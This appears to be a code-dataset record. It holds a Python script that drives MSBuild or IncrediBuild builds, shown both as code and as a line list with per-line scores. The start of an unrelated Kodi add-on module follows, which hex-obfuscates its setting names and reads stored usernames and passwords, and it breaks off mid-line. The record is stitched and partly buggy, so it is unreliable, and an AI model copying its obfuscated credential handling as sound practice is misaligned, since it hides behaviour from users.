    '''Run a build command, retrying up to 6 times; return True on success.'''
    for i in range(6):
        Logger.WriteLine(cmd, ConsoleColor.Cyan)
        buildFailed = True
        startTime = time.time()
        p = subprocess.Popen(cmd) # IncrediBuild must not use stdout=subprocess.PIPE, otherwise p.wait() never returns; probably an IncrediBuild bug
        if IsPy3:
            try:
                buildFailed = p.wait(BuildTimeout)
            except subprocess.TimeoutExpired as e:
                Logger.Log('{0}'.format(e), ConsoleColor.Yellow)
                p.kill()
        else:
            buildFailed = p.wait()
        if not UseMSBuild:
            # IncrediBuild's exit code does not indicate build success; parse its log output instead
            fin = open('IncrediBuild.log')
            for line in fin:
                if line.startswith('=========='):
                    Logger.Write(line, ConsoleColor.Cyan, writeToFile = True if IsPy3 else False)
                    if IsPy3:
                        start = line.find('失败') + 3 #========== 生成: 成功 1 个,失败 0 个,最新 0 个,跳过 0 个 ==========
                    else: # ugly special-casing for py2 compatibility: scan for the second number on the line
                        start = 0
                        n2 = 0
                        while 1:
                            if line[start].isdigit():
                                n2 += 1
                                if n2 == 2:
                                    break
                            start = line.find(' ', start)
                            start += 1
                    end = line.find(' ', start)
                    failCount = int(line[start:end])
                    buildFailed = failCount > 0
                else:
                    Logger.Write(line, ConsoleColor.Red, writeToFile = True if IsPy3 else False, printToStdout = True if ' error ' in line else False)
            fin.close()
        costTime = time.time() - startTime
        Logger.WriteLine('build cost time: {0:.1f}s\n'.format(costTime), ConsoleColor.Green)
        if not buildFailed:
            return True
    return False

def BuildAllProjects():
    '''Compose the clean/build command list and run it; return overall success.'''
    buildSuccess = False
    cmds = []
    if UseMSBuild:
        if IsRebuild:
            if CleanAll:
                cmds.append('{0} {1} /t:Clean /p:Configuration={2} /nologo /maxcpucount /filelogger /consoleloggerparameters:ErrorsOnly'.format(MSBuild, SlnFile, 'Debug'))
                cmds.append('{0} {1} /t:Clean /p:Configuration={2} /nologo /maxcpucount /filelogger /consoleloggerparameters:ErrorsOnly'.format(MSBuild, SlnFile, 'Release'))
            else:
                cmds.append('{0} {1} /t:Clean /p:Configuration={2} /nologo /maxcpucount /filelogger /consoleloggerparameters:ErrorsOnly'.format(MSBuild, SlnFile, BuildType))
        for project in MSBuildFirstProjects:
            cmds.append('{0} {1} /t:{2} /p:Configuration={3} /nologo /maxcpucount /filelogger /consoleloggerparameters:ErrorsOnly'.format(MSBuild, SlnFile, project, BuildType))
        cmds.append('{0} {1} /p:Configuration={2} /nologo /maxcpucount /filelogger /consoleloggerparameters:ErrorsOnly'.format(MSBuild, SlnFile, BuildType))
    else: #IncrediBuild
        if IsRebuild:
            if CleanAll:
                cmds.append('"{0}" {1} /clean /cfg="{2}|Win32" /nologo /out=IncrediBuild.log'.format(IncrediBuild, SlnFile, 'Debug'))
                cmds.append('"{0}" {1} /clean /cfg="{2}|Win32" /nologo /out=IncrediBuild.log'.format(IncrediBuild, SlnFile, 'Release'))
            else:
                cmds.append('"{0}" {1} /clean /cfg="{2}|Win32" /nologo /out=IncrediBuild.log'.format(IncrediBuild, SlnFile, BuildType))
        for project in IncrediBuildFirstProjects:
            cmds.append('"{0}" {1} /build /prj={2} /cfg="{3}|Win32" /nologo /out=IncrediBuild.log'.format(IncrediBuild, SlnFile, project, BuildType))
        cmds.append('"{0}" {1} /build /cfg="{2}|Win32" /nologo /out=IncrediBuild.log'.format(IncrediBuild, SlnFile, BuildType))
    for cmd in cmds:
        buildSuccess = BuildProject(cmd)
        if not buildSuccess:
            break
    return buildSuccess

def main():
    '''Update, run pre-build bats, then build; return 0 on success, 1 on failure.'''
    if UseMSBuild:
        if not os.path.exists(MSBuild):
            Logger.Log('can not find msbuild.exe', ConsoleColor.Red)
            return 1
    else:
        if not os.path.exists(IncrediBuild):
            # Was 'can not find msbuild.exe' — copy-paste error in this branch.
            Logger.Log('can not find BuildConsole.exe', ConsoleColor.Red)
            return 1
    dir = os.path.dirname(__file__)
    if dir:
        oldDir = os.getcwd()
        os.chdir(dir)
    if Update:
        if not UpdateCode():
            return 1
        Logger.Log('git update succeed', ConsoleColor.Green)
    if Copy:
        for bat in ExecBatList:
            oldBatDir = os.getcwd()
            batDir = os.path.dirname(bat)
            batName = os.path.basename(bat)
            if batDir:
                os.chdir(batDir)
            # time.time instead of time.clock: clock was removed in Python 3.8
            start = time.time()
            os.system(batName)
            Logger.Log('run "{}" cost {:.1f} seconds'.format(batName, time.time() - start), ConsoleColor.Green)
            if batDir:
                os.chdir(oldBatDir)
    buildSuccess = BuildAllProjects()
    if buildSuccess:
        Logger.Log('build succeed', ConsoleColor.Green)
    else:
        Logger.Log('build failed', ConsoleColor.Red)
    if dir:
        os.chdir(oldDir)
    return 0 if buildSuccess else 1

if __name__ == '__main__':
    Logger.Log('run with argv ' + str(sys.argv), ConsoleColor.Green)
    sys.argv = [x.lower() for x in sys.argv]
    start_time = time.time()
    if 'debug' in sys.argv:
        BuildType = 'Debug'
    if 'build' in sys.argv:
        IsRebuild = False
        Build = 'Build'
    if 'update' in sys.argv:
        Update = True
    if 'copy' in sys.argv:
        Copy = True
    if 'clean' in sys.argv:
        CleanAll = True
    if 'incredibuild' in sys.argv:
        UseMSBuild = False
    if UseMSBuild:
        MSBuild = GetMSBuildPath()
        if not MSBuild:
            Logger.Log('can not find MSBuild.exe', ConsoleColor.Red)
            exit(1)
    else:
        IncrediBuild = GetIncrediBuildPath()
        if not IncrediBuild:
            Logger.Log('can not find BuildConsole.exe', ConsoleColor.Red)
            exit(1)
    cwd = os.getcwd()
    Logger.WriteLine('current dir is: {0}, {1}: {2}'.format(cwd, Build, BuildType))
    ret = main()
    end_time = time.time()
    cost_time = end_time-start_time
    Logger.WriteLine('all build cost time: {0:.2f} seconds'.format(cost_time), ConsoleColor.Green)
    exit(ret)
[ "#!python3\r\n", "# -*- coding:utf-8 -*-\r\n", "import os\r\n", "import sys\r\n", "import time\r\n", "import ctypes\r\n", "import shutil\r\n", "import subprocess\r\n", "IsPy3 = sys.version_info[0] >= 3\r\n", "if IsPy3:\r\n", " import winreg\r\n", "else:\r\n", " import codecs\r\n", " import _winreg as winreg\r\n", "\r\n", "BuildType = 'Release'\r\n", "IsRebuild = True\r\n", "Build = 'Rebuild'\r\n", "Update = False\r\n", "Copy = False\r\n", "CleanAll = False\r\n", "BuildTimeout = 30*60\r\n", "MSBuild = None\r\n", "IncrediBuild = None\r\n", "UseMSBuild = True #默认用MSBuild编译,如果为False则用IncrediBuild编译\r\n", "\r\n", "#不同项目只需修改下面5个变量\r\n", "SlnFile = '../CAceTCPServer.sln' #相对于本py脚本路径的相对路径\r\n", "UpdateDir = [] #相对于本py脚本路径的相对路径,填空不更新\r\n", "ExecBatList = [] #相对于本py脚本路径的相对路径,编译前调用的脚本,可填空,执行bat会先cd到bat目录再执行\r\n", "MSBuildFirstProjects = [r'CAceTCPServer'] #使用MSBuild需要工程文件在解决方案sln中的路径\r\n", " # MSBuild首先编译的项目,填空不指定顺序\r\n", "IncrediBuildFirstProjects = ['CAceTCPServer'] #使用IncrediBuild只需工程名字\r\n", " #IncrediBuild首先编译的项目,填空不指定顺序\r\n", "\r\n", "class ConsoleColor():\r\n", " '''This class defines the values of color for printing on console window'''\r\n", " Black = 0\r\n", " DarkBlue = 1\r\n", " DarkGreen = 2\r\n", " DarkCyan = 3\r\n", " DarkRed = 4\r\n", " DarkMagenta = 5\r\n", " DarkYellow = 6\r\n", " Gray = 7\r\n", " DarkGray = 8\r\n", " Blue = 9\r\n", " Green = 10\r\n", " Cyan = 11\r\n", " Red = 12\r\n", " Magenta = 13\r\n", " Yellow = 14\r\n", " White = 15\r\n", "\r\n", "class Coord(ctypes.Structure):\r\n", " _fields_ = [('X', ctypes.c_short), ('Y', ctypes.c_short)]\r\n", "\r\n", "class SmallRect(ctypes.Structure):\r\n", " _fields_ = [('Left', ctypes.c_short),\r\n", " ('Top', ctypes.c_short),\r\n", " ('Right', ctypes.c_short),\r\n", " ('Bottom', ctypes.c_short),\r\n", " ]\r\n", "\r\n", "class ConsoleScreenBufferInfo(ctypes.Structure):\r\n", " _fields_ = [('dwSize', Coord),\r\n", " ('dwCursorPosition', Coord),\r\n", " ('wAttributes', ctypes.c_uint),\r\n", " ('srWindow', 
SmallRect),\r\n", " ('dwMaximumWindowSize', Coord),\r\n", " ]\r\n", "\r\n", "class Win32API():\r\n", " '''Some native methods for python calling'''\r\n", " StdOutputHandle = -11\r\n", " ConsoleOutputHandle = None\r\n", " DefaultColor = None\r\n", "\r\n", " @staticmethod\r\n", " def SetConsoleColor(color):\r\n", " '''Change the text color on console window'''\r\n", " if not Win32API.DefaultColor:\r\n", " if not Win32API.ConsoleOutputHandle:\r\n", " Win32API.ConsoleOutputHandle = ctypes.windll.kernel32.GetStdHandle(Win32API.StdOutputHandle)\r\n", " bufferInfo = ConsoleScreenBufferInfo()\r\n", " ctypes.windll.kernel32.GetConsoleScreenBufferInfo(Win32API.ConsoleOutputHandle, ctypes.byref(bufferInfo))\r\n", " Win32API.DefaultColor = int(bufferInfo.wAttributes & 0xFF)\r\n", " if IsPy3:\r\n", " sys.stdout.flush() # need flush stdout in python 3\r\n", " ctypes.windll.kernel32.SetConsoleTextAttribute(Win32API.ConsoleOutputHandle, color)\r\n", "\r\n", " @staticmethod\r\n", " def ResetConsoleColor():\r\n", " '''Reset the default text color on console window'''\r\n", " if IsPy3:\r\n", " sys.stdout.flush() # need flush stdout in python 3\r\n", " ctypes.windll.kernel32.SetConsoleTextAttribute(Win32API.ConsoleOutputHandle, Win32API.DefaultColor)\r\n", "\r\n", "class Logger():\r\n", " LogFile = '@AutomationLog.txt'\r\n", " LineSep = '\\n'\r\n", " @staticmethod\r\n", " def Write(log, consoleColor = -1, writeToFile = True, printToStdout = True):\r\n", " '''\r\n", " consoleColor: value in class ConsoleColor, such as ConsoleColor.DarkGreen\r\n", " if consoleColor == -1, use default color\r\n", " '''\r\n", " if printToStdout:\r\n", " isValidColor = (consoleColor >= ConsoleColor.Black and consoleColor <= ConsoleColor.White)\r\n", " if isValidColor:\r\n", " Win32API.SetConsoleColor(consoleColor)\r\n", " try:\r\n", " sys.stdout.write(log)\r\n", " except UnicodeError as e:\r\n", " Win32API.SetConsoleColor(ConsoleColor.Red)\r\n", " isValidColor = True\r\n", " sys.stdout.write(str(type(e)) + 
' can\\'t print the log!\\n')\r\n", " if isValidColor:\r\n", " Win32API.ResetConsoleColor()\r\n", " if not writeToFile:\r\n", " return\r\n", " if IsPy3:\r\n", " logFile = open(Logger.LogFile, 'a+', encoding = 'utf-8')\r\n", " else:\r\n", " logFile = codecs.open(Logger.LogFile, 'a+', 'utf-8')\r\n", " try:\r\n", " logFile.write(log)\r\n", " # logFile.flush() # need flush in python 3, otherwise log won't be saved\r\n", " except Exception as ex:\r\n", " logFile.close()\r\n", " sys.stdout.write('can not write log with exception: {0} {1}'.format(type(ex), ex))\r\n", "\r\n", " @staticmethod\r\n", " def WriteLine(log, consoleColor = -1, writeToFile = True, printToStdout = True):\r\n", " '''\r\n", " consoleColor: value in class ConsoleColor, such as ConsoleColor.DarkGreen\r\n", " if consoleColor == -1, use default color\r\n", " '''\r\n", " Logger.Write(log + Logger.LineSep, consoleColor, writeToFile, printToStdout)\r\n", "\r\n", " @staticmethod\r\n", " def Log(log, consoleColor = -1, writeToFile = True, printToStdout = True):\r\n", " '''\r\n", " consoleColor: value in class ConsoleColor, such as ConsoleColor.DarkGreen\r\n", " if consoleColor == -1, use default color\r\n", " '''\r\n", " t = time.localtime()\r\n", " log = '{0}-{1:02}-{2:02} {3:02}:{4:02}:{5:02} - {6}{7}'.format(t.tm_year, t.tm_mon, t.tm_mday,\r\n", " t.tm_hour, t.tm_min, t.tm_sec, log, Logger.LineSep)\r\n", " Logger.Write(log, consoleColor, writeToFile, printToStdout)\r\n", "\r\n", " @staticmethod\r\n", " def DeleteLog():\r\n", " if os.path.exists(Logger.LogFile):\r\n", " os.remove(Logger.LogFile)\r\n", "\r\n", "\r\n", "def GetMSBuildPath():\r\n", " cmd = 'call \"%VS120COMNTOOLS%..\\\\..\\\\VC\\\\vcvarsall.bat\" x86\\nwhere msbuild'\r\n", " ftemp = open('GetMSBuildPath.bat', 'wt')\r\n", " ftemp.write(cmd)\r\n", " ftemp.close()\r\n", " p = subprocess.Popen('GetMSBuildPath.bat', stdout = subprocess.PIPE)\r\n", " p.wait()\r\n", " lines = p.stdout.read().decode().splitlines()\r\n", " 
os.remove('GetMSBuildPath.bat')\r\n", " for line in lines:\r\n", " if 'MSBuild.exe' in line:\r\n", " return line\r\n", "\r\n", "def GetIncrediBuildPath():\r\n", " try:\r\n", " key=winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r'SOFTWARE\\Classes\\IncrediBuild.MonitorFile\\shell\\open\\command')\r\n", " value, typeId = winreg.QueryValueEx(key, '')\r\n", " if value:\r\n", " start = value.find('\"')\r\n", " end = value.find('\"', start + 1)\r\n", " path = value[start+1:end]\r\n", " buildConsole = os.path.join(os.path.dirname(path), 'BuildConsole.exe')\r\n", " return buildConsole\r\n", " except FileNotFoundError as e:\r\n", " Logger.WriteLine('can not find IncrediBuild', ConsoleColor.Red)\r\n", "\r\n", "def UpdateCode():\r\n", " # put git to path first\r\n", " if not shutil.which('git.exe'):\r\n", " Logger.Log('找不到git.exe. 请确认安装git时将git\\bin目录路径加入到环境变量path中!!!\\n, 跳过更新代码!!!', ConsoleColor.Yellow)\r\n", " return false\r\n", " oldDir = os.getcwd()\r\n", " for dir in UpdateDir:\r\n", " os.chdir(dir)\r\n", " ret = os.system('git pull')\r\n", " os.chdir(oldDir)\r\n", " if ret != 0:\r\n", " Logger.Log('update {0} failed'.format(dir), ConsoleColor.Yellow)\r\n", " return false\r\n", " return True\r\n", "\r\n", "def BuildProject(cmd):\r\n", " for i in range(6):\r\n", " Logger.WriteLine(cmd, ConsoleColor.Cyan)\r\n", " buildFailed = True\r\n", " startTime = time.time()\r\n", " p = subprocess.Popen(cmd) #IncrediBuild不能使用stdout=subprocess.PIPE,否则会导致p.wait()不返回,可能是IncrediBuild的bug\r\n", " if IsPy3:\r\n", " try:\r\n", " buildFailed = p.wait(BuildTimeout)\r\n", " except subprocess.TimeoutExpired as e:\r\n", " Logger.Log('{0}'.format(e), ConsoleColor.Yellow)\r\n", " p.kill()\r\n", " else:\r\n", " buildFailed = p.wait()\r\n", " if not UseMSBuild:\r\n", " #IncrediBuild的返回值不能说明编译是否成功,需要提取输出判断\r\n", " fin = open('IncrediBuild.log')\r\n", " for line in fin:\r\n", " if line.startswith('=========='):\r\n", " Logger.Write(line, ConsoleColor.Cyan, writeToFile = True if IsPy3 else False)\r\n", " if 
IsPy3:\r\n", " start = line.find('失败') + 3 #========== 生成: 成功 1 个,失败 0 个,最新 0 个,跳过 0 个 ==========\r\n", " else:#为了兼容py2做的特殊处理,很恶心\r\n", " start = 0\r\n", " n2 = 0\r\n", " while 1:\r\n", " if line[start].isdigit():\r\n", " n2 += 1\r\n", " if n2 == 2:\r\n", " break\r\n", " start = line.find(' ', start)\r\n", " start += 1\r\n", " end = line.find(' ', start)\r\n", " failCount = int(line[start:end])\r\n", " buildFailed = failCount > 0\r\n", " else:\r\n", " Logger.Write(line, ConsoleColor.Red, writeToFile = True if IsPy3 else False, printToStdout = True if ' error ' in line else False)\r\n", " fin.close()\r\n", " costTime = time.time() - startTime\r\n", " Logger.WriteLine('build cost time: {0:.1f}s\\n'.format(costTime), ConsoleColor.Green)\r\n", " if not buildFailed:\r\n", " return True\r\n", " return False\r\n", "\r\n", "def BuildAllProjects():\r\n", " buildSuccess = False\r\n", " cmds = []\r\n", " if UseMSBuild:\r\n", " if IsRebuild:\r\n", " if CleanAll:\r\n", " cmds.append('{0} {1} /t:Clean /p:Configuration={2} /nologo /maxcpucount /filelogger /consoleloggerparameters:ErrorsOnly'.format(MSBuild, SlnFile, 'Debug'))\r\n", " cmds.append('{0} {1} /t:Clean /p:Configuration={2} /nologo /maxcpucount /filelogger /consoleloggerparameters:ErrorsOnly'.format(MSBuild, SlnFile, 'Release'))\r\n", " else:\r\n", " cmds.append('{0} {1} /t:Clean /p:Configuration={2} /nologo /maxcpucount /filelogger /consoleloggerparameters:ErrorsOnly'.format(MSBuild, SlnFile, BuildType))\r\n", " for project in MSBuildFirstProjects:\r\n", " cmds.append('{0} {1} /t:{2} /p:Configuration={3} /nologo /maxcpucount /filelogger /consoleloggerparameters:ErrorsOnly'.format(MSBuild, SlnFile, project, BuildType))\r\n", " cmds.append('{0} {1} /p:Configuration={2} /nologo /maxcpucount /filelogger /consoleloggerparameters:ErrorsOnly'.format(MSBuild, SlnFile, BuildType))\r\n", " else: #IncrediBuild\r\n", " if IsRebuild:\r\n", " if CleanAll:\r\n", " cmds.append('\"{0}\" {1} /clean /cfg=\"{2}|Win32\" /nologo 
/out=IncrediBuild.log'.format(IncrediBuild, SlnFile, 'Debug'))\r\n", " cmds.append('\"{0}\" {1} /clean /cfg=\"{2}|Win32\" /nologo /out=IncrediBuild.log'.format(IncrediBuild, SlnFile, 'Release'))\r\n", " else:\r\n", " cmds.append('\"{0}\" {1} /clean /cfg=\"{2}|Win32\" /nologo /out=IncrediBuild.log'.format(IncrediBuild, SlnFile, BuildType))\r\n", " for project in IncrediBuildFirstProjects:\r\n", " cmds.append('\"{0}\" {1} /build /prj={2} /cfg=\"{3}|Win32\" /nologo /out=IncrediBuild.log'.format(IncrediBuild, SlnFile, project, BuildType))\r\n", " cmds.append('\"{0}\" {1} /build /cfg=\"{2}|Win32\" /nologo /out=IncrediBuild.log'.format(IncrediBuild, SlnFile, BuildType))\r\n", " for cmd in cmds:\r\n", " buildSuccess = BuildProject(cmd)\r\n", " if not buildSuccess:\r\n", " break\r\n", " return buildSuccess\r\n", "\r\n", "def main():\r\n", " if UseMSBuild:\r\n", " if not os.path.exists(MSBuild):\r\n", " Logger.Log('can not find msbuild.exe', ConsoleColor.Red)\r\n", " return 1\r\n", " else:\r\n", " if not os.path.exists(IncrediBuild):\r\n", " Logger.Log('can not find msbuild.exe', ConsoleColor.Red)\r\n", " return 1\r\n", " dir = os.path.dirname(__file__)\r\n", " if dir:\r\n", " oldDir = os.getcwd()\r\n", " os.chdir(dir)\r\n", " if Update:\r\n", " if not UpdateCode():\r\n", " return 1\r\n", " Logger.Log('git update succeed', ConsoleColor.Green)\r\n", " if Copy:\r\n", " for bat in ExecBatList:\r\n", " oldBatDir = os.getcwd()\r\n", " batDir = os.path.dirname(bat)\r\n", " batName = os.path.basename(bat)\r\n", " if batDir:\r\n", " os.chdir(batDir)\r\n", " start = time.clock()\r\n", " os.system(batName)\r\n", " Logger.Log('run \"{}\" cost {:.1f} seconds'.format(batName, time.clock() - start), ConsoleColor.Green)\r\n", " if batDir:\r\n", " os.chdir(oldBatDir)\r\n", " buildSuccess = BuildAllProjects()\r\n", " if buildSuccess:\r\n", " Logger.Log('build succeed', ConsoleColor.Green)\r\n", " else:\r\n", " Logger.Log('build failed', ConsoleColor.Red)\r\n", " if dir:\r\n", " 
os.chdir(oldDir)\r\n", " return 0 if buildSuccess else 1\r\n", "\r\n", "if __name__ == '__main__':\r\n", " Logger.Log('run with argv ' + str(sys.argv), ConsoleColor.Green)\r\n", " sys.argv = [x.lower() for x in sys.argv]\r\n", " start_time = time.time()\r\n", " if 'debug' in sys.argv:\r\n", " BuildType = 'Debug'\r\n", " if 'build' in sys.argv:\r\n", " IsRebuild = False\r\n", " Build = 'Build'\r\n", " if 'update' in sys.argv:\r\n", " Update = True\r\n", " if 'copy' in sys.argv:\r\n", " Copy = True\r\n", " if 'clean' in sys.argv:\r\n", " CleanAll = True\r\n", " if 'incredibuild' in sys.argv:\r\n", " UseMSBuild = False\r\n", " if UseMSBuild:\r\n", " MSBuild = GetMSBuildPath()\r\n", " if not MSBuild:\r\n", " Logger.Log('can not find MSBuild.exe', ConsoleColor.Red)\r\n", " exit(1)\r\n", " else:\r\n", " IncrediBuild = GetIncrediBuildPath()\r\n", " if not IncrediBuild:\r\n", " Logger.Log('can not find BuildConsole.exe', ConsoleColor.Red)\r\n", " exit(1)\r\n", " cwd = os.getcwd()\r\n", " Logger.WriteLine('current dir is: {0}, {1}: {2}'.format(cwd, Build, BuildType))\r\n", " ret = main()\r\n", " end_time = time.time()\r\n", " cost_time = end_time-start_time\r\n", " Logger.WriteLine('all build cost time: {0:.2f} seconds'.format(cost_time), ConsoleColor.Green)\r\n", " exit(ret)\r\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.034482758620689655, 0, 0.058823529411764705, 0.0392156862745098, 0.05128205128205128, 0.029850746268656716, 0.027777777777777776, 0.06451612903225806, 0.028985507246376812, 0.08571428571428572, 0, 0.043478260869565216, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.03125, 0, 0, 0.027777777777777776, 0, 0.024390243902439025, 0.023255813953488372, 0.022727272727272728, 0.058823529411764705, 0, 0.02, 0, 0.022222222222222223, 0.020833333333333332, 0.024390243902439025, 0.020833333333333332, 0.058823529411764705, 0, 0.05263157894736842, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.00909090909090909, 0, 0.008403361344537815, 0, 0, 0.015625, 0.010752688172043012, 0, 0, 0, 0, 0, 0.015625, 0.009174311926605505, 0, 0.058823529411764705, 0, 0, 0.05263157894736842, 0.08536585365853659, 0, 0.012048192771084338, 0, 0, 0, 0.009615384615384616, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.02857142857142857, 0, 0, 0, 0, 0.011627906976744186, 0, 0, 0.010416666666666666, 0, 0, 0.08139534883720931, 0, 0.012048192771084338, 0, 0, 0.011627906976744186, 0, 0, 0.075, 0, 0.012048192771084338, 0, 0, 0, 0.009615384615384616, 0.015384615384615385, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.02702702702702703, 0, 0, 0, 0, 0, 0, 0, 0.03571428571428571, 0, 0.016666666666666666, 0, 0, 0, 0, 0, 0.011904761904761904, 0, 0, 0, 0, 0.05263157894736842, 0, 0, 0.009433962264150943, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.041666666666666664, 0, 0, 0, 0, 0.026785714285714284, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.02, 0, 0, 0, 0.030303030303030304, 0, 0.01834862385321101, 0.044444444444444446, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.03289473684210526, 0, 0, 0.010638297872340425, 0, 0, 0, 0, 0.04, 0, 0, 0, 0, 0, 0.005780346820809248, 0.005714285714285714, 0, 0.005714285714285714, 0, 0.00558659217877095, 0.006329113924050633, 0.08, 0, 0, 0.007407407407407408, 0.0072992700729927005, 0, 0.0072992700729927005, 0, 0.006622516556291391, 0.007751937984496124, 0, 
0, 0, 0, 0, 0, 0.07692307692307693, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.008771929824561403, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.03571428571428571, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011764705882352941, 0, 0, 0, 0.01, 0 ]
343
0.006222
false
# -*- coding: utf-8 -*- # script.module.python.koding.aio # Python Koding AIO (c) by whufclee (info@totalrevolution.tv) # Python Koding AIO is licensed under a # Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. # You should have received a copy of the license along with this # work. If not, see http://creativecommons.org/licenses/by-nc-nd/4.0. # IMPORTANT: If you choose to use the special noobsandnerds features which hook into their server # please make sure you give approptiate credit in your add-on description (noobsandnerds.com) # # Please make sure you've read and understood the license, this code can NOT be used commercially # and it can NOT be modified and redistributed. If you're found to be in breach of this license # then any affected add-ons will be blacklisted and will not be able to work on the same system # as any other add-ons which use this code. Thank you for your cooperation. import os import re import shutil import sys import time import urllib import urllib2 import xbmc import xbmcaddon import xbmcgui import inspect try: import simplejson as json except: import json from addons import * from android import * from database import * from directory import * from filetools import * from guitools import * from router import * from systemtools import * from tutorials import * from video import * from web import * def converthex(url): """ internal command ~""" import binascii return binascii.unhexlify(url) try: ADDON_ID = xbmcaddon.Addon().getAddonInfo('id') except: ADDON_ID = Caller() AddonVersion = xbmcaddon.Addon(id=ADDON_ID).getAddonInfo('version') try: if sys.argv[1] == converthex('7465737466696c65'): ADDON_ID = ADDON_ID+'.test' except: pass if ADDON_ID.endswith(converthex('2e74657374')): ORIG_ID = ADDON_ID[:-5] else: ORIG_ID = ADDON_ID TestID = ADDON_ID if not ADDON_ID.endswith(converthex('2e74657374')): TestID = ADDON_ID+converthex('2e74657374') MODULE_ID = 'script.module.python.koding.aio' ADDON = 
xbmcaddon.Addon(id=ADDON_ID) THIS_MODULE = xbmcaddon.Addon(id=MODULE_ID) USE_TEST = Addon_Setting(addon_id=ADDON_ID,setting=converthex('74657374766572')) USERDATA = xbmc.translatePath(converthex('7370656369616c3a2f2f70726f66696c65')) ADDON_DATA = xbmc.translatePath(os.path.join(USERDATA,converthex('6164646f6e5f64617461'))) ADDONS = xbmc.translatePath(converthex('7370656369616c3a2f2f686f6d652f6164646f6e73')) PACKAGES = os.path.join(ADDONS,converthex('7061636b61676573')) UPDATE_ICON = os.path.join(ADDONS,MODULE_ID,converthex('7265736f7572636573'),converthex('7570646174652e706e67')) COOKIE = os.path.join(ADDON_DATA,ORIG_ID,converthex('636f6f6b696573'),converthex('74656d70')) RUNCODE = os.path.join(ADDON_DATA,ORIG_ID,converthex('636f6f6b696573'),converthex('6b6565706d65')) DOWNLOAD_DST = xbmc.translatePath(converthex('7370656369616c3a2f2f686f6d652f6164646f6e732f7061636b616765732f6370')) LOGIN = Addon_Setting(addon_id=ORIG_ID,setting=converthex('6c6f67696e')) FORUM = Addon_Setting(addon_id=ORIG_ID,setting=converthex('666f72756d')) USERNAME = Addon_Setting(addon_id=ORIG_ID,setting=converthex('757365726e616d65')).replace(' ','%20') if LOGIN == 'true' else '' PASSWORD = Addon_Setting(addon_id=ORIG_ID,setting=converthex('70617373776f7264')) if LOGIN == 'true' else '' DEBUG = Addon_Setting(addon_id=ORIG_ID,setting=converthex('6465627567')) INSTALL_REPOS = Addon_Setting(addon_id=ORIG_ID,setting=converthex('696e7374616c6c7265706f73')) INSTALL_ADDONS = Addon_Setting(addon_id=ORIG_ID,setting=converthex('696e7374616c6c6164646f6e73')) SILENT_MODE = Addon_Setting(addon_id=ORIG_ID,setting=converthex('73696c656e74')) KODI_VER = int(float(xbmc.getInfoLabel("System.BuildVersion")[:2])) dialog = xbmcgui.Dialog() dp = xbmcgui.DialogProgress() launch = 'launch.py' main_counter = 0 downloads = [] stddownloads = [] nologindownloads = [] usernamelen = len(USERNAME) if usernamelen > 14: usernamelen = 15 if FORUM == converthex('556e6f6666696369616c204b6f646920537570706f7274'): FORUM = 'k' if 
FORUM == converthex('436f6d6d756e697479204275696c647320537570706f7274'): FORUM = 'c' if not os.path.exists(os.path.join(ADDON_DATA,ORIG_ID,converthex('636f6f6b696573'))): os.makedirs(os.path.join(ADDON_DATA,ORIG_ID,converthex('636f6f6b696573'))) #---------------------------------------------------------------- # TUTORIAL # def dolog(string, my_debug = False): """ Print to the Kodi log but only if debugging is enabled in settings.xml CODE: koding.dolog(string, [my_debug]) AVAILABLE PARAMS: (*) string - This is your text you want printed to log. my_debug - This is optional, if you set this to True you will print to the log regardless of what the debug setting is set at in add-on settings. EXAMPLE CODE: koding.dolog(string='Quick test to see if this gets printed to the log', my_debug=True)~""" import xbmc global DEBUG global ADDON_ID if DEBUG == 'true' or my_debug: xbmc.log('### %s : %s'%(ADDON_ID,string), 2) #---------------------------------------------------------------- def Check_Addons(addons): """ internal command ~""" if ',' in addons and INSTALL_ADDONS != '0': addon_array = addons.split(',') for addon in addon_array: Main('addoninstall|id:%s~version:%s~repo:%s~silent:%s~installtype:%s' % (addon,KODI_VER,INSTALL_REPOS,SILENT_MODE,INSTALL_ADDONS)) #---------------------------------------------------------------- def Check_Cookie(mode = ''): """ internal command ~""" if not os.path.exists(COOKIE): cookie_folder = os.path.join(ADDON_DATA,ORIG_ID,converthex('636f6f6b696573')) if not os.path.exists(cookie_folder): os.makedirs(cookie_folder) writefile = open(COOKIE,'w') writefile.close() readfile = open(COOKIE,'r') content = Encryption('d',readfile.read()) readfile.close() loginmatch = re.compile('w="(.+?)"').findall(content) basematch = re.compile('b="(.+?)"').findall(content) datematch = re.compile('d="(.+?)"').findall(content) addonsmatch = re.compile('a="(.+?)"').findall(content) basedomain = basematch[0] if (len(basematch) > 0) else 'http://noobsandnerds.com' 
date = datematch[0] if (len(datematch) > 0) else '0' welcometext = loginmatch[0] if (len(loginmatch) > 0) else '' addons = addonsmatch[0] if (len(addonsmatch) > 0) else '' returns = ['register','PASSWORD','restricted','reactivate'] LOGIN = Addon_Setting(addon_id=ORIG_ID,setting=converthex('6c6f67696e')) USERNAME = Addon_Setting(addon_id=ORIG_ID,setting=converthex('757365726e616d65')) if LOGIN == 'true' else '' PASSWORD = Addon_Setting(addon_id=ORIG_ID,setting=converthex('70617373776f7264')) if LOGIN == 'true' else '' if welcometext not in returns and welcometext != USERNAME: run_cookie = True elif LOGIN == 'true' and welcometext == '': User_Info() return elif LOGIN == 'true' and welcometext != USERNAME: run_cookie = True elif LOGIN == 'false' and welcometext == USERNAME: run_cookie = True else: run_cookie = False if run_cookie: try: shutil.rmtree(COOKIE) except: pass if mode == 'base': if int(date)+1000000 < 